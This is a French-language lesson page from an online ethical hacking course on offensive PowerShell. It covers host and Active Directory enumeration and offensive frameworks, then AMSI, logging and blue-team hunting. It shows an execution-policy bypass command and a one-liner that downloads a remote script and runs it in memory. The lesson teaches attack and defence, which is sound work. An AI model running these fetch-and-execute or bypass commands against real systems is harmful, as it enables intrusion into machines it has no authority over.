Ethical Hacking Academy · Leçon

PowerShell pour les attaquants

PowerShell offensif

Leçon 4 sur 413 étapes

PowerShell pour les attaquants est une leçon Ethical Hacking Academy gratuite sur CoddyKit. Ceci est la leçon 4 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Ethical Hacking Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Ethical Hacking Academy comprend 4 leçons au total.

Pourquoi PowerShell

PowerShell est intégré à Windows, profondément intégré à l’OS et à .NET, et approuvé par les administrateurs. Cela en fait un outil living-off-the-land privilégié des attaquants : aucun logiciel malveillant à déposer.

Cette leçon présente les concepts de PowerShell offensif que vous devez comprendre pour attaquer et défendre Windows.

Applets de commande et pipeline

Les commandes PowerShell sont des applets de commande sous la forme Verbe-Nom. Elles transmettent des objets riches, et pas seulement du texte, dans le pipeline, ce qui rend l’énumération très puissante.

Get-Process | Where-Object { $_.CPU -gt 10 } | Select-Object Name, Id

Énumération du système

Les attaquants utilisent les applets de commande intégrées pour examiner rapidement un hôte : utilisateurs, services, réseau et correctifs.

Get-LocalUser
Get-Service | Where-Object Status -eq 'Running'
Get-NetTCPConnection -State Listen

La stratégie d’exécution n’est pas une mesure de sécurité

La stratégie d’exécution restreint l’exécution des fichiers de script, mais ne constitue pas une limite de sécurité. De nombreux paramètres simples permettent de la contourner ; les défenseurs ne doivent donc pas s’y fier.

powershell -ExecutionPolicy Bypass -File script.ps1

Télécharger et exécuter

Une technique courante récupère une charge utile et l’exécute en mémoire, en laissant peu de traces sur le disque. C’est pourquoi la surveillance du réseau et d’AMSI est importante.

IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/tool.ps1')

Commandes encodées

Le paramètre -EncodedCommand exécute du PowerShell encodé en Base64, souvent pour dissimuler l’intention lors d’une inspection superficielle et contourner les filtres simples.

Les défenseurs décodent ces commandes à partir des journaux pour révéler ce qui a réellement été exécuté.

powershell -EncodedCommand <base64-here>

Cadres d’exploitation offensifs

Des boîtes à outils matures s’appuient sur ces primitives :

  • PowerSploit / PowerView : énumération d’AD et post-exploitation ;
  • Empire / Covenant : commande et contrôle ;
  • Nishang : scripts offensifs.

La plupart sont désormais largement détectés par les défenses au moyen de signatures.

Reconnaissance d’Active Directory

Dans un domaine, PowerShell (PowerView ou le module AD) cartographie les utilisateurs, les groupes et les relations d’approbation, ce qui permet de trouver un chemin vers l’administrateur du domaine.

Get-ADUser -Filter * -Properties LastLogonDate
Get-ADGroupMember 'Domain Admins'

AMSI et journalisation

Microsoft a ajouté des défenses spécifiquement contre l’utilisation abusive de PowerShell :

  • AMSI (Antimalware Scan Interface) analyse le contenu des scripts avant leur exécution ;
  • la journalisation des blocs de script enregistre ce qui est exécuté ;
  • le mode de langage contraint limite les fonctionnalités dangereuses.

Les attaquants tentent de contourner AMSI ; les défenseurs surveillent les journaux.

Recherche défensive

Les équipes bleues recherchent les activités PowerShell malveillantes en examinant :

  • les commandes encodées ou obfusquées ;
  • les récupérations réseau via DownloadString / IEX ;
  • les processus parents inhabituels (Office lançant PowerShell) ;
  • les journaux de blocs de script AMSI et de l’événement ID 4104.

Utilisation éthique

Ces techniques sont puissantes et correspondent directement à des intrusions réelles. Exécutez-les uniquement dans votre propre laboratoire ou avec une autorisation écrite explicite.

Pratiquer l’aspect défensif — lire les journaux et repérer les détections AMSI — est tout aussi utile que l’aspect offensif.

Vérification rapide

Évaluez la stratégie d’exécution en tant que mesure de contrôle.

Récapitulatif

Vous avez exploré le PowerShell offensif :

  • Les applets de commande fondées sur des objets rendent l’énumération puissante et discrète (living-off-the-land).
  • Téléchargement et exécution, commandes encodées et cadres comme PowerView ou Empire.
  • La stratégie d’exécution n’est pas une mesure de sécurité ; AMSI et la journalisation des blocs de script constituent les véritables défenses.
  • Agissez toujours de manière éthique et étudiez l’aspect défensif.

Ce cours sur les composants internes de Windows est terminé.

Gratuit pour commencer

Apprends Ethical Hacking Academy avec un tuteur IA — gratuit

Écris et exécute du vrai code dans ton navigateur, obtiens de l'aide instantanée d'un tuteur IA disponible 24h/24, et reprends là où tu t'es arrêté sur le web ou dans l'app.

Cours
31
Leçons
111

Questions Fréquemment Posées

La leçon « PowerShell pour les attaquants » est-elle gratuite ?

Oui — le texte complet de « PowerShell pour les attaquants » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Ethical Hacking Academy, passe à CoddyKit PRO. Le cours Ethical Hacking Academy comprend 4 leçons au total.

Qu'est-ce que j'apprendrai dans « PowerShell pour les attaquants » ?

PowerShell offensif Tu pratiques Ethical Hacking Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.

Dois-je avoir de l'expérience pour commencer Ethical Hacking Academy ?

Aucune expérience préalable n'est requise. Ethical Hacking Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 4 sur 4.

Combien de temps prend la leçon « PowerShell pour les attaquants » ?

La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.

Peux-tu écrire et exécuter du code dans cette leçon Ethical Hacking Academy ?

Oui. Chaque leçon Ethical Hacking Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.

Toutes les leçons de ce cours

  1. Architecture de Windows
  2. Registre
  3. Authentification Windows
  4. PowerShell pour les attaquants
← Retour à Ethical Hacking Academy